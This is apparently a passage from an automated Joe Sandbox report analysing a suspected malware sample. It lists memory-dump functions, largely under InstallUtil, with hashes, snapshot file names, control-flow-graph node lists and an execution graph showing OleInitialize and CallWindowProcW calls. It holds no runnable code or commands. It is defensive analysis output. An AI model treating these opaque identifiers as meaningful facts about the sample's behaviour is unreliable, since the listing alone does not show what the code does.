                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 1243b0297900441f802d5c52adc73795bf3d0d4b476adae82761cda44809b2c5
                                                                                                            • Instruction ID: 46e9c3773b4330515fc9b2a4e3c48d417ef21abe3b355a1fe495afe947df35f9
                                                                                                            • Opcode Fuzzy Hash: 1243b0297900441f802d5c52adc73795bf3d0d4b476adae82761cda44809b2c5
                                                                                                            • Instruction Fuzzy Hash: A191AFB4A46269CFEB64DF64CE44BE9B7B1EB89305F0085EAD409A3252DB745EC1CF01
                                                                                                            Function 089B3141 Relevance: .2, Instructions: 179COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2290944282.00000000089B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_89b0000_87M9Y3P4Z7.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 2ab27c92b1e5c07b7308fabb7a4d5cc76bb62a0afabe5095f3afb468b8c96639
                                                                                                            • Instruction ID: ff35c7b433f6de161512927a169c20e24c7f2f199a3930ac07962f5fbef3ee7f
                                                                                                            • Opcode Fuzzy Hash: 2ab27c92b1e5c07b7308fabb7a4d5cc76bb62a0afabe5095f3afb468b8c96639
                                                                                                            • Instruction Fuzzy Hash: B891AFB4942269CFEB64DF64CE44BE9B7B1EB89305F0085EAD409A3292DB745EC1CF01
                                                                                                            Function 089B0011 Relevance: .1, Instructions: 125COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2290944282.00000000089B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_89b0000_87M9Y3P4Z7.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: b16bb4cb735cba2260fb62163229b0608351cec90bf1d35880ffaf2a6027a3bf
                                                                                                            • Instruction ID: 99b63d307884b3feb21e9ff7ac992a78414e0511e29e87091f2a47d7d0c78f46
                                                                                                            • Opcode Fuzzy Hash: b16bb4cb735cba2260fb62163229b0608351cec90bf1d35880ffaf2a6027a3bf
                                                                                                            • Instruction Fuzzy Hash: 59515E71D056588BEB6DCF6B8D542CAFAF3AFC9300F14C1FA944CAA265DB700A858F51
                                                                                                            Function 088C3E0F Relevance: .1, Instructions: 123COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2289353636.00000000088C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 088C0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_88c0000_87M9Y3P4Z7.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 3659e60a976c80054b50cb5a41ecf7e52831798a0980e452d92d8cca855ae6a1
                                                                                                            • Instruction ID: c759e106f48e9b14d9fe6a7042db1d47f805535e03847615878f60c0a7e7c9d5
                                                                                                            • Opcode Fuzzy Hash: 3659e60a976c80054b50cb5a41ecf7e52831798a0980e452d92d8cca855ae6a1
                                                                                                            • Instruction Fuzzy Hash: 31513EB4E14618DFDB64CFA9D884A8DFBF5BF48314F1081A9E428E7615DB34AA95CF00
                                                                                                            Function 089B0040 Relevance: .1, Instructions: 118COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2290944282.00000000089B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_89b0000_87M9Y3P4Z7.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: b29ab7677912b08935814a3f0ce8b9a27f883986d19c9f90af3c39946e1d6a45
                                                                                                            • Instruction ID: 0231f83f0b98f774f79c933da69f1ad7983d882c39f5272a180f5688c78ec75b
                                                                                                            • Opcode Fuzzy Hash: b29ab7677912b08935814a3f0ce8b9a27f883986d19c9f90af3c39946e1d6a45
                                                                                                            • Instruction Fuzzy Hash: 58514F71D056588BEB6CCF6B8D446CAFAF7AFC9301F14C1FA984CA6255DB700A858E41
                                                                                                            Function 089BD340 Relevance: .1, Instructions: 114COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2290944282.00000000089B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_89b0000_87M9Y3P4Z7.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 38176d28a65b1675fc46da27aea85eddc724aa5334b52149d5a59f8fa6924c09
                                                                                                            • Instruction ID: 4e819e4d96f36f1f5125fb7a8ed21532f4ea726cbf5c15f33e04b0b2611521fc
                                                                                                            • Opcode Fuzzy Hash: 38176d28a65b1675fc46da27aea85eddc724aa5334b52149d5a59f8fa6924c09
                                                                                                            • Instruction Fuzzy Hash: 3741ECB4D003488FEB14DFA9DA84ADEBBF5AB49314F209029E815BB290D774A885CF45
                                                                                                            Function 088C0011 Relevance: .1, Instructions: 102COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2289353636.00000000088C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 088C0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_88c0000_87M9Y3P4Z7.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: c70fe3622256cabb30dc9aa8da819ca9305818a63ae8abdeb25f5c738a226601
                                                                                                            • Instruction ID: 1c1491ec28c79394a9cf7fc0f194ea4a82aeb603c5e4aac72134ff6faadc5df0
                                                                                                            • Opcode Fuzzy Hash: c70fe3622256cabb30dc9aa8da819ca9305818a63ae8abdeb25f5c738a226601
                                                                                                            • Instruction Fuzzy Hash: 26415271E05A54DFE759CF6B8D4059AFBF3AFC9201F18C0BA844C9B269EA344546CF11
                                                                                                            Function 08C30040 Relevance: .1, Instructions: 70COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2292181466.0000000008C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08C30000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_8c30000_87M9Y3P4Z7.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 178ef42db92e650d6d3d98fe96808f1f40b8476bb07867863fbd485bf4421e9c
                                                                                                            • Instruction ID: fb76e700dd09ce3eddec617965aa0caff000a754fc98e58e38f63432b36cc819
                                                                                                            • Opcode Fuzzy Hash: 178ef42db92e650d6d3d98fe96808f1f40b8476bb07867863fbd485bf4421e9c
                                                                                                            • Instruction Fuzzy Hash: D531C971D056298BEB28CF1ACD4479AFAF7BFC8301F04C1AAC40CA6255D7705A869F45
                                                                                                            Function 08C3001B Relevance: .1, Instructions: 70COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2292181466.0000000008C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08C30000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_8c30000_87M9Y3P4Z7.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d5c0cb0d62e4724340d2feb0c1a1a8d2a9a20737950d0d13c78eba6329045944
                                                                                                            • Instruction ID: 1997e467c48138fd10ef5e91f9c331d955bc634d8701f01b81f0dc91b48bc886
                                                                                                            • Opcode Fuzzy Hash: d5c0cb0d62e4724340d2feb0c1a1a8d2a9a20737950d0d13c78eba6329045944
                                                                                                            • Instruction Fuzzy Hash: A131EC71D057688BEB29CF2A8D54399BBF7AFC5200F08C1EAC44CAA265D7340986CF11

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:10.2%
                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                            Signature Coverage:0%
                                                                                                            Total number of Nodes:20
                                                                                                            Total number of Limit Nodes:1
                                                                                                            execution_graph 27256 66c2e38 27257 66c2e60 27256->27257 27260 66c2e8c 27256->27260 27258 66c2e69 27257->27258 27261 66c22d4 27257->27261 27262 66c22df 27261->27262 27264 66c3183 27262->27264 27265 66c22f0 27262->27265 27264->27260 27266 66c31b8 OleInitialize 27265->27266 27267 66c321c 27266->27267 27267->27264 27244 66c0c40 27248 66c0c60 27244->27248 27252 66c0c70 27244->27252 27245 66c0c5a 27249 66c0c70 27248->27249 27250 66c0d0a CallWindowProcW 27249->27250 27251 66c0cb9 27249->27251 27250->27251 27251->27245 27253 66c0cb2 27252->27253 27255 66c0cb9 27252->27255 27254 66c0d0a CallWindowProcW 27253->27254 27253->27255 27254->27255 27255->27245

                                                                                                            Executed Functions

                                                                                                            Function 05EB0040 Relevance: 2.8, Instructions: 2751COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.2433408673.0000000005EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_5eb0000_InstallUtil.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 5029577fcd2648cd664b471054d04325d38e6b1c36644508dd0e85a1b645a1cb
                                                                                                            • Instruction ID: b78af0a2482af01ed1723bb934176aff342ac0583a75c01382e2170446419f61
                                                                                                            • Opcode Fuzzy Hash: 5029577fcd2648cd664b471054d04325d38e6b1c36644508dd0e85a1b645a1cb
                                                                                                            • Instruction Fuzzy Hash: 6453D831D10B1A8ADB11EF68C8945AAF7B1FF99300F51D79AE45877121EB70AAC4CF81
                                                                                                            Function 05EB3390 Relevance: 2.2, Instructions: 2212COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.2433408673.0000000005EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_5eb0000_InstallUtil.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 216d2456dcd4b5c513216bce35cfb8adff1e3acba2f10006021b5f97189684f3
                                                                                                            • Instruction ID: 1a7f32d843601b6ee3d6fcb0b1d36729fb2ca5af1693d98a4196cf12ffb853c0
                                                                                                            • Opcode Fuzzy Hash: 216d2456dcd4b5c513216bce35cfb8adff1e3acba2f10006021b5f97189684f3
                                                                                                            • Instruction Fuzzy Hash: 11231C31D107198ADB11EF68C8809EEF7B1FF99300F15D79AE449A7211EB70AAC5CB81
                                                                                                            Function 05EB88A8 Relevance: 1.9, Strings: 1, Instructions: 604COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1005 5eb88a8-5eb88c5 1006 5eb88c7-5eb88ca 1005->1006 1007 5eb88ee-5eb88f1 1006->1007 1008 5eb88cc-5eb88e9 1006->1008 1009 5eb8a07-5eb8a10 1007->1009 1010 5eb88f7-5eb88fa 1007->1010 1008->1007 1014 5eb8938-5eb8941 1009->1014 1015 5eb8a16 1009->1015 1012 5eb88fc-5eb890d 1010->1012 1013 5eb8912-5eb8915 1010->1013 1012->1013 1018 5eb891f-5eb8922 1013->1018 1019 5eb8917-5eb891a 1013->1019 1016 5eb8947-5eb8952 1014->1016 1017 5eb8a96-5eb8ac3 1014->1017 1020 5eb8a1b-5eb8a1e 1015->1020 1016->1017 1021 5eb8958-5eb8968 1016->1021 1041 5eb8acd-5eb8ad0 1017->1041 1026 5eb8933-5eb8936 1018->1026 1027 5eb8924-5eb8928 1018->1027 1019->1018 1024 5eb8a2a-5eb8a2d 1020->1024 1025 5eb8a20-5eb8a23 1020->1025 1021->1017 1029 5eb896e-5eb8972 1021->1029 1035 5eb8a3a-5eb8a3d 1024->1035 1036 5eb8a2f-5eb8a35 1024->1036 1030 5eb8a59-5eb8a71 1025->1030 1031 5eb8a25 1025->1031 1026->1014 1028 5eb8977-5eb897a 1026->1028 1033 5eb8a88-5eb8a95 1027->1033 1034 5eb892e 1027->1034 1039 5eb897c-5eb897d 1028->1039 1040 5eb8982-5eb8985 1028->1040 1029->1028 1042 5eb8a76-5eb8a78 1030->1042 1031->1024 1034->1026 1037 5eb8a3f-5eb8a4f 1035->1037 1038 5eb8a54-5eb8a57 1035->1038 1036->1035 1037->1038 1038->1030 1038->1042 1039->1040 1043 5eb89a2-5eb89a5 1040->1043 1044 5eb8987-5eb899d 1040->1044 1046 5eb8af2-5eb8af5 1041->1046 1047 5eb8ad2-5eb8ad6 1041->1047 1049 5eb8a7a 1042->1049 1050 5eb8a7f-5eb8a82 1042->1050 1051 5eb89af-5eb89b2 1043->1051 1052 5eb89a7-5eb89ac 1043->1052 1044->1043 1055 5eb8af7-5eb8b01 1046->1055 1056 5eb8b06-5eb8b09 1046->1056 1053 5eb8bba-5eb8bc8 1047->1053 1054 5eb8adc-5eb8ae4 1047->1054 1049->1050 1050->1006 1050->1033 1058 5eb89be-5eb89c1 1051->1058 1059 5eb89b4-5eb89bd 1051->1059 1052->1051 1074 5eb8bca-5eb8bf4 1053->1074 1075 5eb8c21-5eb8c22 1053->1075 1054->1053 1060 5eb8aea-5eb8aed 1054->1060 1055->1056 1061 5eb8b2b-5eb8b2e 1056->1061 1062 5eb8b0b-5eb8b0f 1056->1062 1063 5eb89c3-5eb89ca 1058->1063 1064 5eb89d1-5eb89d4 1058->1064 1060->1046 1070 5eb8b38-5eb8b3b 1061->1070 1071 5eb8b30-5eb8b37 1061->1071 1062->1053 1069 5eb8b15-5eb8b1d 1062->1069 1063->1039 1065 5eb89cc 1063->1065 1064->1025 1066 5eb89d6-5eb89d9 1064->1066 1065->1064 1072 5eb89db-5eb89f0 1066->1072 1073 5eb89f5-5eb89f8 1066->1073 1069->1053 1076 5eb8b23-5eb8b26 1069->1076 1077 5eb8b4b-5eb8b4e 1070->1077 1078 5eb8b3d-5eb8b44 1070->1078 1072->1073 1084 5eb89fa-5eb89ff 1073->1084 1085 5eb8a02-5eb8a05 1073->1085 1083 5eb8bf6-5eb8bf9 1074->1083 1086 5eb8fcb-5eb8fd2 1075->1086 1087 5eb8c24-5eb8c2c 1075->1087 1076->1061 1081 5eb8b68-5eb8b6b 1077->1081 1082 5eb8b50-5eb8b54 1077->1082 1079 5eb8bb2-5eb8bb9 1078->1079 1080 5eb8b46 1078->1080 1080->1077 1090 5eb8b6d-5eb8b7e 1081->1090 1091 5eb8b83-5eb8b86 1081->1091 1082->1053 1088 5eb8b56-5eb8b5e 1082->1088 1092 5eb8bfb-5eb8c02 1083->1092 1093 5eb8c07-5eb8c0a 1083->1093 1084->1085 1085->1009 1085->1020 1094 5eb8fd7-5eb8fd9 1086->1094 1095 5eb8c2d-5eb8c30 1087->1095 1088->1053 1096 5eb8b60-5eb8b63 1088->1096 1090->1091 1101 5eb8b88-5eb8b8c 1091->1101 1102 5eb8ba0-5eb8ba2 1091->1102 1092->1093 1097 5eb8c0c-5eb8c0f 1093->1097 1098 5eb8c84-5eb8e18 1093->1098 1099 5eb8fdb 1094->1099 1100 5eb8fe0-5eb8fe3 1094->1100 1095->1098 1103 5eb8c32-5eb8c35 1095->1103 1096->1081 1097->1095 1107 5eb8c11-5eb8c20 1097->1107 1156 5eb8e1e-5eb8e25 1098->1156 1157 5eb8f51-5eb8f64 1098->1157 1099->1100 1100->1083 1108 5eb8fe9-5eb8ff2 1100->1108 1101->1053 1109 5eb8b8e-5eb8b96 1101->1109 1110 5eb8ba9-5eb8bac 1102->1110 1111 5eb8ba4 1102->1111 1104 5eb8c53-5eb8c56 1103->1104 1105 5eb8c37-5eb8c48 1103->1105 1112 5eb8c58-5eb8c6b 1104->1112 1113 5eb8c6e-5eb8c71 1104->1113 1105->1086 1120 5eb8c4e 1105->1120 1107->1075 1109->1053 1114 5eb8b98-5eb8b9b 1109->1114 1110->1041 1110->1079 1111->1110 1117 5eb8c7b-5eb8c7e 1113->1117 1118 5eb8c73-5eb8c78 1113->1118 1114->1102 1117->1098 1122 5eb8f67-5eb8f6a 1117->1122 1118->1117 1120->1104 1124 5eb8f88-5eb8f8b 1122->1124 1125 5eb8f6c-5eb8f7d 1122->1125 1127 5eb8f8d-5eb8f9e 1124->1127 1128 5eb8fa5-5eb8fa8 1124->1128 1125->1107 1133 5eb8f83 1125->1133 1127->1086 1136 5eb8fa0 1127->1136 1129 5eb8faa-5eb8fbb 1128->1129 1130 5eb8fc6-5eb8fc9 1128->1130 1129->1112 1137 5eb8fc1 1129->1137 1130->1086 1130->1094 1133->1124 1136->1128 1137->1130 1158 5eb8e2b-5eb8e5e 1156->1158 1159 5eb8ed9-5eb8ee0 1156->1159 1169 5eb8e63-5eb8ea4 1158->1169 1170 5eb8e60 1158->1170 1159->1157 1160 5eb8ee2-5eb8f15 1159->1160 1172 5eb8f1a-5eb8f47 1160->1172 1173 5eb8f17 1160->1173 1181 5eb8ebc-5eb8ec3 1169->1181 1182 5eb8ea6-5eb8eb7 1169->1182 1170->1169 1172->1108 1172->1157 1173->1172 1183 5eb8ecb-5eb8ecd 1181->1183 1182->1108 1183->1108
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.2433408673.0000000005EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_5eb0000_InstallUtil.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $
                                                                                                            • API String ID: 0-3993045852
                                                                                                            • Opcode ID: e1c830eff1f98981b3016292cb8bfc8c996707a6109bdee461fda221c4b7f4f1
                                                                                                            • Instruction ID: ff8f513d46df2f24f81f15cc1eac5697d344dcaa639e13c357f315256f7c20fd
                                                                                                            • Opcode Fuzzy Hash: e1c830eff1f98981b3016292cb8bfc8c996707a6109bdee461fda221c4b7f4f1
                                                                                                            • Instruction Fuzzy Hash: 7522CF75E042198FEF24DBA4C480AEFBBB6FB85315F20856AD485EB344DA71DC42CB91
                                                                                                            Function 00C441F0 Relevance: 1.5, Strings: 1, Instructions: 281COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1211 c441f0-c44256 1214 c442a0-c442a2 1211->1214 1215 c44258-c44263 1211->1215 1217 c442a4-c442bd 1214->1217 1215->1214 1216 c44265-c44271 1215->1216 1218 c44294-c4429e 1216->1218 1219 c44273-c4427d 1216->1219 1223 c442bf-c442cb 1217->1223 1224 c44309-c4430b 1217->1224 1218->1217 1220 c44281-c44290 1219->1220 1221 c4427f 1219->1221 1220->1220 1225 c44292 1220->1225 1221->1220 1223->1224 1226 c442cd-c442d9 1223->1226 1227 c4430d-c44365 1224->1227 1225->1218 1228 c442fc-c44307 1226->1228 1229 c442db-c442e5 1226->1229 1236 c44367-c44372 1227->1236 1237 c443af-c443b1 1227->1237 1228->1227 1230 c442e7 1229->1230 1231 c442e9-c442f8 1229->1231 1230->1231 1231->1231 1233 c442fa 1231->1233 1233->1228 1236->1237 1238 c44374-c44380 1236->1238 1239 c443b3-c443cb 1237->1239 1240 c44382-c4438c 1238->1240 1241 c443a3-c443ad 1238->1241 1246 c44415-c44417 1239->1246 1247 c443cd-c443d8 1239->1247 1242 c44390-c4439f 1240->1242 1243 c4438e 1240->1243 1241->1239 1242->1242 1245 c443a1 1242->1245 1243->1242 1245->1241 1248 c44419-c4447e 1246->1248 1247->1246 1249 c443da-c443e6 1247->1249 1258 c44487-c444e7 1248->1258 1259 c44480-c44486 1248->1259 1250 c443e8-c443f2 1249->1250 1251 c44409-c44413 1249->1251 1253 c443f4 1250->1253 1254 c443f6-c44405 1250->1254 1251->1248 1253->1254 1254->1254 1255 c44407 1254->1255 1255->1251 1266 c444f7-c444fb 1258->1266 1267 c444e9-c444ed 1258->1267 1259->1258 1269 c444fd-c44501 1266->1269 1270 c4450b-c4450f 1266->1270 1267->1266 1268 c444ef 1267->1268 1268->1266 1269->1270 1271 c44503 1269->1271 1272 c44511-c44515 1270->1272 1273 c4451f-c44523 1270->1273 1271->1270 1272->1273 1274 c44517-c4451a call c40ab0 1272->1274 1275 c44525-c44529 1273->1275 1276 c44533-c44537 1273->1276 1274->1273 1275->1276 1277 c4452b-c4452e call c40ab0 1275->1277 1278 c44547-c4454b 1276->1278 1279 c44539-c4453d 1276->1279 1277->1276 1283 c4454d-c44551 1278->1283 1284 c4455b-c4455f 1278->1284 1279->1278 1282 c4453f-c44542 call c40ab0 1279->1282 1282->1278 1283->1284 1286 c44553 1283->1286 1287 c44561-c44565 1284->1287 1288 c4456f 1284->1288 1286->1284 1287->1288 1289 c44567 1287->1289 1290 c44570 1288->1290 1289->1288 1290->1290
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.2415579357.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_c40000_InstallUtil.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: \Vik
                                                                                                            • API String ID: 0-2800833850
                                                                                                            • Opcode ID: 98aeed442e4fb7ddee6c9d27dbc35a396aebd1e9a1b478e0835d4c69d0ec0d58
                                                                                                            • Instruction ID: 4a1af37be2d4f07f2340e64dc2811ad1d9dcdace1e0d617ca7ecc7ec49fb62ef
                                                                                                            • Opcode Fuzzy Hash: 98aeed442e4fb7ddee6c9d27dbc35a396aebd1e9a1b478e0835d4c69d0ec0d58
                                                                                                            • Instruction Fuzzy Hash: D6B12071E00209CFDF14CFA9D8857EDBBF2BF88714F248129E815AB254EB749945CB81
                                                                                                            Function 00C43EA8 Relevance: 1.5, Strings: 1, Instructions: 238COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1374 c43ea8-c43f0e 1377 c43f10-c43f1b 1374->1377 1378 c43f58-c43f5a 1374->1378 1377->1378 1379 c43f1d-c43f29 1377->1379 1380 c43f5c-c43fb4 1378->1380 1381 c43f4c-c43f56 1379->1381 1382 c43f2b-c43f35 1379->1382 1389 c43fb6-c43fc1 1380->1389 1390 c43ffe-c44000 1380->1390 1381->1380 1383 c43f37 1382->1383 1384 c43f39-c43f48 1382->1384 1383->1384 1384->1384 1386 c43f4a 1384->1386 1386->1381 1389->1390 1392 c43fc3-c43fcf 1389->1392 1391 c44002-c4401a 1390->1391 1399 c44064-c44066 1391->1399 1400 c4401c-c44027 1391->1400 1393 c43fd1-c43fdb 1392->1393 1394 c43ff2-c43ffc 1392->1394 1396 c43fdd 1393->1396 1397 c43fdf-c43fee 1393->1397 1394->1391 1396->1397 1397->1397 1398 c43ff0 1397->1398 1398->1394 1401 c44068-c440b6 1399->1401 1400->1399 1402 c44029-c44035 1400->1402 1410 c440bc-c440ca 1401->1410 1403 c44037-c44041 1402->1403 1404 c44058-c44062 1402->1404 1405 c44045-c44054 1403->1405 1406 c44043 1403->1406 1404->1401 1405->1405 1408 c44056 1405->1408 1406->1405 1408->1404 1411 c440d3-c44133 1410->1411 1412 c440cc-c440d2 1410->1412 1419 c44135-c44139 1411->1419 1420 c44143-c44147 1411->1420 1412->1411 1419->1420 1421 c4413b 1419->1421 1422 c44157-c4415b 1420->1422 1423 c44149-c4414d 1420->1423 1421->1420 1424 c4415d-c44161 1422->1424 1425 c4416b-c4416f 1422->1425 1423->1422 1426 c4414f-c44152 call c40ab0 1423->1426 1424->1425 1427 c44163-c44166 call c40ab0 1424->1427 1428 c44171-c44175 1425->1428 1429 c4417f-c44183 1425->1429 1426->1422 1427->1425 1428->1429 1432 c44177-c4417a call c40ab0 1428->1432 1433 c44185-c44189 1429->1433 1434 c44193-c44197 1429->1434 1432->1429 1433->1434 1436 c4418b 1433->1436 1437 c441a7 1434->1437 1438 c44199-c4419d 1434->1438 1436->1434 1440 c441a8 1437->1440 1438->1437 1439 c4419f 1438->1439 1439->1437 1440->1440
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.2415579357.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_c40000_InstallUtil.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: \Vik
                                                                                                            • API String ID: 0-2800833850
                                                                                                            • Opcode ID: 376abb1a9bf3ee3cf1ca1079799532e7cd2656cf281f84d33c420287230ded9d
                                                                                                            • Instruction ID: 8469703e6dfe2eca0ddae254dce409339ef678af69114ee8f91643c273692102
                                                                                                            • Opcode Fuzzy Hash: 376abb1a9bf3ee3cf1ca1079799532e7cd2656cf281f84d33c420287230ded9d
                                                                                                            • Instruction Fuzzy Hash: A5916E70E00249DFDF14CFA9D8857DEBBF2BF88714F248129E425AB294DB749985CB81
                                                                                                            Function 05EB0006 Relevance: 1.3, Instructions: 1298COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.2433408673.0000000005EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_5eb0000_InstallUtil.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 81bc1b8fd6df2e6f0cd5335dad5b9856d6ab053fc31d787145c1e32d67d066aa
                                                                                                            • Instruction ID: 52898caf643ce147c17d2640c9b934079ad8279869f80deaa407a6ed52ac24f0
                                                                                                            • Opcode Fuzzy Hash: 81bc1b8fd6df2e6f0cd5335dad5b9856d6ab053fc31d787145c1e32d67d066aa
                                                                                                            • Instruction Fuzzy Hash: FAD2F731D10B1A8ADB11EF68C8545AAF7B1FF99300F11D79AE45877221EB70AAD4CF81
                                                                                                            Function 05EB0025 Relevance: 1.3, Instructions: 1289COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.2433408673.0000000005EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_5eb0000_InstallUtil.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: c9ae252d1d527c5897466706e2111975d7f497fa810bbd9374d042f41a89fd22
                                                                                                            • Instruction ID: 26dd6acc421b6ad7478a97979f747c7dd07b6ada8a9c40009946628036c04351
                                                                                                            • Opcode Fuzzy Hash: c9ae252d1d527c5897466706e2111975d7f497fa810bbd9374d042f41a89fd22
                                                                                                            • Instruction Fuzzy Hash: 32D2E831D10B1A8ADB11EF68C8545AAF7B1FF99300F11D79AE45877221EB70AAD4CF81
                                                                                                            Function 05EB5988 Relevance: 1.1, Instructions: 1051COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.2433408673.0000000005EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_5eb0000_InstallUtil.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 5cc60b871563e0b662549835827abd4c94806ab78123b24ccb1d87f7ecd01f72
                                                                                                            • Instruction ID: 6e584a449f9431c500d89d577173d4353b5783b52a4d50af411de9758589e50f
                                                                                                            • Opcode Fuzzy Hash: 5cc60b871563e0b662549835827abd4c94806ab78123b24ccb1d87f7ecd01f72
                                                                                                            • Instruction Fuzzy Hash: E0A23634A002148FEB24DB58C584BAEB7F2FB45319F5494AAE489EB361DB75EC85CF40
                                                                                                            Function 05EBE959 Relevance: .6, Instructions: 566COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.2433408673.0000000005EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EB0000, based on PE: false
